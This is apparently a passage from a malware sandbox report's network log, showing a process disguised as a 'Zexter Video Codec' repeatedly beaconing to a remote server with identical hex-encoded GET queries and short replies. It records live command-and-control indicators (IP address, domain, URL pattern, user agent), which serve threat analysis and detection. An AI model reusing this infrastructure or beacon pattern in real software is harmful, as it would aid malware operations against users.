Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20

Timestamp: Oct 3, 2024 08:40:24.856023073 CEST | Bytes transferred: 321 | Direction: OUT
GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
Host: ezebtfp.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Oct 3, 2024 08:40:25.094882965 CEST | Bytes transferred: 220 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 03 Oct 2024 06:40:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 23 | Source IP: 192.168.2.5 | Source Port: 49737 | Destination IP: 185.208.158.248 | Destination Port: 80 | PID: 1216 | Process: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe

Timestamp: Oct 3, 2024 08:40:25.221575022 CEST | Bytes transferred: 321 | Direction: OUT
GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
Host: ezebtfp.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Oct 3, 2024 08:40:25.951258898 CEST | Bytes transferred: 220 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 03 Oct 2024 06:40:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20

Timestamp: Oct 3, 2024 08:40:26.059247017 CEST | Bytes transferred: 321 | Direction: OUT
GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
Host: ezebtfp.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Oct 3, 2024 08:40:26.309604883 CEST | Bytes transferred: 220 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 03 Oct 2024 06:40:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20

Timestamp: Oct 3, 2024 08:40:26.418903112 CEST | Bytes transferred: 321 | Direction: OUT
GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
Host: ezebtfp.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Oct 3, 2024 08:40:26.660608053 CEST | Bytes transferred: 220 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 03 Oct 2024 06:40:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.5 | 49738 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 08:40:26.783632040 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
Host: ezebtfp.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:27.473336935 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 03 Oct 2024 06:40:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.5 | 49739 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 08:40:27.596875906 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
Host: ezebtfp.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:28.280956030 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 03 Oct 2024 06:40:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.5 | 49740 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 08:40:28.413230896 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
Host: ezebtfp.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:29.573659897 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 03 Oct 2024 06:40:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Oct 3, 2024 08:40:29.574014902 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 03 Oct 2024 06:40:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Oct 3, 2024 08:40:29.574028969 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 03 Oct 2024 06:40:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Oct 3, 2024 08:40:29.684413910 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
Host: ezebtfp.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:29.920331001 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 03 Oct 2024 06:40:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Oct 3, 2024 08:40:30.028692961 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
Host: ezebtfp.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:30.273920059 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 03 Oct 2024 06:40:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.5 | 49741 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 08:40:30.393368959 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
Host: ezebtfp.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:31.086678028 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 03 Oct 2024 06:40:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.5 | 49742 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 08:40:31.266186953 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
Host: ezebtfp.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:31.954016924 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 03 Oct 2024 06:40:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.5 | 49743 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 08:40:32.081784010 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
Host: ezebtfp.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:32.796659946 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 03 Oct 2024 06:40:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.5 | 49744 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 08:40:32.924369097 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
Host: ezebtfp.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:33.609812975 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 03 Oct 2024 06:40:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.5 | 49745 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 08:40:33.736789942 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
Host: ezebtfp.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:34.425209999 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 03 Oct 2024 06:40:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.5 | 49746 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 08:40:34.564533949 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
Host: ezebtfp.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:35.273886919 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 03 Oct 2024 06:40:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.5 | 49747 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe

Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 08:40:35.393002987 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
    Host: ezebtfp.ua
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:36.073275089 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 03 Oct 2024 06:40:35 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Oct 3, 2024 08:40:36.184425116 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
    Host: ezebtfp.ua
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:36.429343939 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 03 Oct 2024 06:40:36 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.5 | 49748 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe

Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 08:40:36.553056002 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
    Host: ezebtfp.ua
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:37.238071918 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 03 Oct 2024 06:40:37 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.5 | 49749 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe

Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 08:40:37.362029076 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
    Host: ezebtfp.ua
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:38.061415911 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 03 Oct 2024 06:40:37 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Oct 3, 2024 08:40:38.168545008 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
    Host: ezebtfp.ua
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:38.412102938 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 03 Oct 2024 06:40:38 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.5 | 49750 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe

Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 08:40:38.533473015 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
    Host: ezebtfp.ua
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:39.225233078 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 03 Oct 2024 06:40:39 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.5 | 49751 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe

Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 08:40:39.346096992 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
    Host: ezebtfp.ua
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:40.026340008 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 03 Oct 2024 06:40:39 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Oct 3, 2024 08:40:40.137485027 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
    Host: ezebtfp.ua
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:40.389560938 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 03 Oct 2024 06:40:40 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Oct 3, 2024 08:40:40.496808052 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
    Host: ezebtfp.ua
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:40.731971025 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 03 Oct 2024 06:40:40 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.5 | 49752 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe

Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 08:40:40.861183882 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
    Host: ezebtfp.ua
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:41.558625937 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 03 Oct 2024 06:40:41 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Oct 3, 2024 08:40:41.671484947 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
    Host: ezebtfp.ua
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:41.907891035 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
